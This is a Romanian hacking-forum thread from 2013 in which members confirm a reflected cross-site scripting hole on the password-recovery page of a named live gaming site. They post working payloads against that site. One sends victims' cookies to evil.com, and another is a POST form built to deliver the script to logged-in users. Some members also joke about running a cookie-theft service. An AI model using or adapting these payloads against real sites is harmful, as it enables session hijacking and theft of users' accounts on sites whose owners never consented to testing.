iuly1997 Posted September 2, 2013 Report Posted September 2, 2013 Am gasit ceva pe Joaca acum! Doizece.ro - Poker, Whist, Rentz, Rummy si multe alte jocuri multiplayer.. dar nu sunt sigur ce este.. este XSS sau ce este??PROOF:Este vreo vulnerabilitate sau ma insel? Quote
iuly1997 Posted September 2, 2013 Author Report Posted September 2, 2013 cred ca o sa dau report.... dar tot nu sunt sigur ce este Quote
dekeeu Posted September 2, 2013 Report Posted September 2, 2013 1. Nu mai folosi Acunetix, ca nu inveti nimic.2. Din cate vad acolo ai putut sa inchizi tagul mai devreme , deci probabil poti injecta si javascript macar intr-un atribut.3. Bun, sa zicem ca il raportezi , cum trimiti e-mailul ? Ii intrebi pe cei din echipa tehnica ce ai gasit ? Quote
iuly1997 Posted September 2, 2013 Author Report Posted September 2, 2013 Sunt incepator deci.. ) mai am de invatat, folosesc acunetix doar daca nu reusesc sa gasesc nimic... mai am de invatat Quote
dekeeu Posted September 2, 2013 Report Posted September 2, 2013 Incearca sa injectezi : 'onmouseover='alert(1) sau '/><script>alert(0)</script> sa vezi daca nu sare alertul . Quote
iuly1997 Posted September 2, 2013 Author Report Posted September 2, 2013 Nu sare alertu, dar la '/><script>alert(0)</script> se inchide tagu mai devremeVulnerabilitatea este la http://www.doizece.ro/account/password-recoveryCine vrea sa incerce.. si sa imi spuna si mie ce gaseste Quote
Active Members dancezar Posted September 2, 2013 Active Members Report Posted September 2, 2013 '><script>alert(1)</script> la mine functioneaza Quote
wHoIS Posted September 2, 2013 Report Posted September 2, 2013 Pe vulpe(firefox) sare dar pe Chrome nu. Quote
iuly1997 Posted September 2, 2013 Author Report Posted September 2, 2013 Da, si la mine sare alertu pe mozilla firefox(inainte foloseam chrome)Cum ar putea fi exploatat acest XSS ? sunt curios Quote
Active Members dancezar Posted September 2, 2013 Active Members Report Posted September 2, 2013 '><script>document.location="http://evil.com/script.php?c="+document.cookie;</script>http://evil.com/script.php inregistreaza acel paramtru c intr-un fisier sau intr-o baza de date c find cookieurile victimei Quote
kalash1337 Posted September 2, 2013 Report Posted September 2, 2013 Da, si la mine sare alertu pe mozilla firefox(inainte foloseam chrome)Cum ar putea fi exploatat acest XSS ? sunt curiosDai search inainte sa intrebi ceva? Quote
yo20063 Posted September 2, 2013 Report Posted September 2, 2013 Sper ca nu o sa le trimiti vectorul cu numele meu! Quote
asasinulmortii Posted September 2, 2013 Report Posted September 2, 2013 1. acelui script ii mai trebuie un parametru cu fisierul (probabil voi face un serviciu online de steal cookies pentru toti)2. tu furi cookieurile cui ? ale tale? Quote
Active Members dancezar Posted September 2, 2013 Active Members Report Posted September 2, 2013 1. acelui script ii mai trebuie un parametru cu fisierul (probabil voi face un serviciu online de steal cookies pentru toti)2. tu furi cookieurile cui ? ale tale?Defapt merge exploatat in felul asta:<form action="http://www.doizece.ro/account/password-recovery" method="POST"><input type="hidden" name="email" value="'><script>alert(1)</script>" /><input type="hidden" name="submit" value="Trimite" /><input type="submit" value="XSS Click Here" /></form>Codul HTML il stochezi pe un site,in inputul email se afla vectorul xss care v-a fi trimis pe pagina lor.Daca victima da click pe acel buton vectorul xss v-a fi trimis pe pagina doizece si executat:) Quote
asasinulmortii Posted September 2, 2013 Report Posted September 2, 2013 Asta daca userul care da click este logat Pacat ca nu e shtml ca atunci ramaneau astia fara site Quote
